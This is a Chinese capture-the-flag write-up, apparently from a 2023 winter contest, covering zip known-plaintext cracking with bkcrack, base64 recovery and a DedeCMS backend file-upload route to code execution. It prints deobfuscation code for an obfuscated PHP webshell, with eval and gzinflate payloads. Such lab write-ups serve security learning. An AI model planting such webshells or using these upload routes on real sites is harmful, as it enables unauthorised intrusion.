首页 > 其他分享 >春秋杯2023冬季赛writeup_cyi

春秋杯2023冬季赛writeup_cyi

时间:2024-01-25 23:23:04浏览次数:23  
标签:OO0000 writeup base64 flag 一下 O00OO0 2023 O0OO00 cyi

cyi WRITEUP

个人信息

个人名称:cyi

个人排名:51

解题情况

请粘贴个人排名截图和答题情况截图:

解题过程

题目序号 谁偷吃了我的外卖

操作内容:

Winhex查看了一下,发现最后有个标志,直接binwalk+foremost

提取出一个压缩包

给了段注释,不知道什么用

本身还以为缺的用户1缺的四字符加上bumai(卜卖)爆破密码呢,结果爆不出,拉到最后发现==,就提一下文件名

Winrar提取文件名,word删除多余字节,但还不是有序的

排序一下

#include <bits/stdc++.h>
using namespace std;
int main(){
map<int,string>map1;
while(1){
int int1;
string string2;
cin >> int1 >> string2;
map1[int1] = string2;
if(int1==0) break;
}
map<int,string> sortedMap(map1.begin(),map1.end());
string ans="";
for(int i=1;i<=10898;i++){
ans+=sortedMap[i];
}
cout<<ans;
return 0;
}

看着这串,感觉像base64,base64解码一下

import base64

with open(路径, 'rb') as file:
data = file.read()

encoded_data = base64.b64decode(data)

with open(保存路径, 'wb') as file:
file.write(encoded_data)

Winhex看到前面,zip头缺了,补一下打开,发现打不开,懵逼ing,突然想起前面的的注释,-=/,尝试把-和/替换再补一下

拿到前半段flag,然后就很明显了,明文攻击,bkcrack一下

再反转一下字符

flag值:

flag{W1sh_y0u_AaaAaaaaaaaaaaa_w0nderfu1_CTF_journe9}

题目序号 明文混淆

操作内容:

给了一个加密压缩包,加密算法zipcrypro store,很有明文攻击的味道

Shell2.php资源管理器说是jb的,我就拿了phpstorm文件的license前面的固定字节The following files can be redistributed under the license below:去爆破,没爆出来,注意到这个license大小,我就试着能不能找到一样大小的license

找到一个,下载了下来,但crc码不一样,bkcrack不出来,心灰意冷之时,打开发现原来有公共license

Bkcrack一下

得到shell.php

一个微盾php解密

<?php
$O00OO0 = urldecode("%6E1%7A%62%2F%6D%615%5C%76%740%6928%2D%70%78%75%71%79%2A6%6C%72%6B%64%679%5F%65%68%63%73%77%6F4%2B%6637%6A");
$O00O0O = $O00OO0{3} . $O00OO0{6} . $O00OO0{33} . $O00OO0{30};
$O0OO00 = $O00OO0{33} . $O00OO0{10} . $O00OO0{24} . $O00OO0{10} . $O00OO0{24};
$OO0O00 = $O0OO00{0} . $O00OO0{18} . $O00OO0{3} . $O0OO00{0} . $O0OO00{1} . $O00OO0{24};
$OO0000 = $O00OO0{7} . $O00OO0{13};
$O00O0O .= $O00OO0{22} . $O00OO0{36} . $O00OO0{29} . $O00OO0{26} . $O00OO0{30} . $O00OO0{32} . $O00OO0{35} . $O00OO0{26} . $O00OO0{30};
//eval($O00O0O("JE8wTzAwMD0idVNxTHlDandXcFpIaGlLbWZGR1ZUQmFOcllvSXpsZWd4Sk1iUkRVRUFrUWN0bnZzZE9QWGladnVUYWdmY0hiWFloZVdNeUtObEx3U2pvQ25ydEFCeE9RRHNKcGRrUG1JekdFVlJVRnFGSjlmd1hrZWJxYllEYVlHQVd0aWJXeFlSS3BDb1d5cmJsbzBxMnN0bzI5UGJaQkdObExHUnlRNEF0T2dzUFNlc2E5THBkc0VEeVJwVVhzZU5kVjRScDVyUjNtNHNkUkZJR0hPSTJ0bmJQdGxTS3oybEdIYkFHSE53Z3k1TlBiTk5QejROV0M1TnJMMElXU2RtcGQ5RlpJSGVaUDdua0MvRkI9PSI7ZXZhbCgnPz4nLiRPMDBPME8oJE8wT08wMCgkT08wTzAwKCRPME8wMDAsJE9PMDAwMCoyKSwkT08wTzAwKCRPME8wMDAsJE9PMDAwMCwkT08wMDAwKSwkT08wTzAwKCRPME8wMDAsMCwkT08wMDAwKSkpKTs="));

$O0O000 = "uSqLyCjwWpZHhiKmfFGVTBaNrYoIzlegxJMbRDUEAkQctnvsdOPXiZvuTagfcHbXYheWMyKNlLwSjoCnrtABxOQDsJpdkPmIzGEVRUFqFJ9fwXkebqbYDaYGAWtibWxYRKpCoWyrblo0q2sto29PbZBGNlLGRyQ4AtOgsPSesa9LpdsEDyRpUXseNdV4Rp5rR3m4sdRFIGHOI2tnbPtlSKz2lGHbAGHNwgy5NPbNNPz4NWC5NrL0IWSdmpd9FZIHeZP7nkC/FB==";
echo (htmlspecialchars('?>') . $O00O0O($O0OO00($OO0O00($O0O000, $OO0000 * 2), $OO0O00($O0O000, $OO0000, $OO0000), $OO0O00($O0O000, 0, $OO0000))));

echo gzinflate(base64_decode('U0gtS8zRcFCJD/APDolWT8tJTK8uNswt8DGOrzIsiHfIS4kvNzYzzUj1yVFUVKxVj9W0trcDAA=='))

?>

flag值:

flag{s1mpL3_z1p_@nd_w365heLl!!!}

题目序号 基于挑战码的双向认证1

操作内容:

非预期了,来自web手(虽没做出来web)的瞎玩,发现有权限进root,两个没权限,一个云服

进实例

flag值:

flag{59865080-ea07-430f}

题目序号 基于挑战码的双向认证2

操作内容:

和上面一样

flag值:

flag{80ba3807-b659-4c2c}

题目序号 ezdede

操作内容:

开始一直在注这个search界面,网上也有sql注入,结果没注出来,算了,关注一下公众号吧。

根据提示,进入后台,同时找到了一个rce文章

进入模块—文件管理器—文件上传

根目录下

flag值:

flag{a7b5bb92-574b-4337-b824-e19bc975d5fa}

注:不是原来提交那个

标签:OO0000,writeup,base64,flag,一下,O00OO0,2023,O0OO00,cyi
From: https://www.cnblogs.com/xhzccy/p/17988389

相关文章

  • cyi polarctf冬季个人挑战赛WriteUp
     PolarCTF网络安全2023冬季个人挑战赛WRITEUP参赛人员:楚颖iPolarCTF网络安全个人挑战赛组委会制  目录第一部分:MISC11-1签到喵11-4机密4第二部分:CRYPTO72-5base11第三部分:WEB133-1cool133-2cookie欺骗143-4干正则163-7随机值1......
  • 2023全国网络安全职业技能大赛决赛
    2023年全国网络安全行业职业技能大赛电子数据取证分析师操作技能赛题项目介绍简介电子数据取证分析师项目需要选手对各类电子数据的现场及在线提取固定,如不同的存储介质、智能终端、服务器及数据库、物联网和工程控制系统等,恢复基于物理修复或数据特征等的电子数据,并进行......
  • 通付盾获2023年移动互联网APP安全漏洞治理优秀案例
    获工信部CAPPVD漏洞库技术支撑单位为深入贯彻落实《网络产品安全漏洞管理规定》,规范移动互联网App产品安全漏洞发现、报告、修补和发布等行为,提升网络产品提供者安全漏洞管理意识,探索最前沿的漏洞挖掘技术发展趋势和创新应用,在上级主管部门指导支持下,1月16日,中国软件评测中心(工业......
  • 2023 年精选:我们正在见证开源的终结吗?
    开源软件被誉为软件创建领域的开创性运动,已成为现代软件开发不可或缺的支柱。它通常被描述为民主化技术,使无数个人和组织能够协作和创新。然而,社区现在正处于一个关键时刻,有人猜测我们正在看到开源领域的衰退。为什么开源在现代软件开发中如此受欢迎?开源的核心在于协作的力量。与专......
  • P9697 [GDCPC2023] Canvas(强联通分量)
    题意简述有一个长度为\(n\)的数组\(a\)和\(m\)次操作,\(a_i\)初始为\(0\)。每次操作形如\(l_i,x_i,r_i,y_i\)表示执行\(a_{l_i}\leftarrowx_i,a_{r_i}\leftarrowy_i\),你可以改变\(m\)次操作的执行顺序,求最终\(\sum_{i=1}^na_i\)的最大值,并给出执行操作的顺序。......
  • 中国移动CMCC rax3000m免拆机刷OpenWRT uboot 20231027 NAND emmc MT7981
    1、100大洋购买的CMCCARX3000,不刷系统的时候也挺好用,就是无法满足特殊需求2、输入路由地址、192.168.10.1,进入路由管理界面,账号和密码,设备背面默认3、在高级设置->管理->配置管理->导出配置文件、得到:cfg_export_config_file.conf文件 4、在linux系统下,Ubuntu下进行文件配......
  • 再获认可|原点安全入选 FreeBuf《CCSIP 2023中国网络安全行业全景册》
    1月24日,FreeBuf咨询正式发布《CCSIP(China Cyber Security Industry Panorama)2023中国网络安全行业全景册(第六版)》(下称“全景册”)。全景册旨在为企业提供更好的网络安全产品选型参考,帮助企业了解中国网络安全技术与市场的发展趋势,受到行业的广泛关注与一致认可。原点安全凭借领......
  • GB/T 34131-2023《电力储能用电池管理系统》解读及测试实践
    新国标简介: GB/T34131《电力储能用电池管理系统》是规定了电力储能用电池管理系统的技术要求、试验方法、检验规则、标志、包装、运输与贮存要求的国家标准。随着我国储能行业的迅猛发展,国标也相应地进行系统性更新。 2023年10月1日,GB/T34131-2023《电力储能用电池管理系......
  • P9779_[HUSTFC 2023] 不定项选择题_题解
    rt题目有一道共n个选项的不定项选择题,它的答案至少包含一个选项,由于题目与选项的内容晦涩难懂,你打算通过尝试每一种可能的答案来通过这道题。初始时所有选项都没有被勾选,你可以执行任意次下述操作:勾选一个当前未被勾选的选项。取消勾选一个当前已被勾选的选项。当你......
  • 北京UE外包团队:2023年上市UE5端游盘点
    一、《夜鸦》使用虚幻5引擎的写实风游戏画面为基础,支持手游和PC双平台。该作预计将于2023年4月在韩国首发,随后将在全球发布。《夜鸦》使用虚幻5引擎的写实风游戏画面为基础,支持手游和PC双平台。该作预计将于2023年4月在韩国首发,随后将在全球发布。游戏最大的特点是1,000人......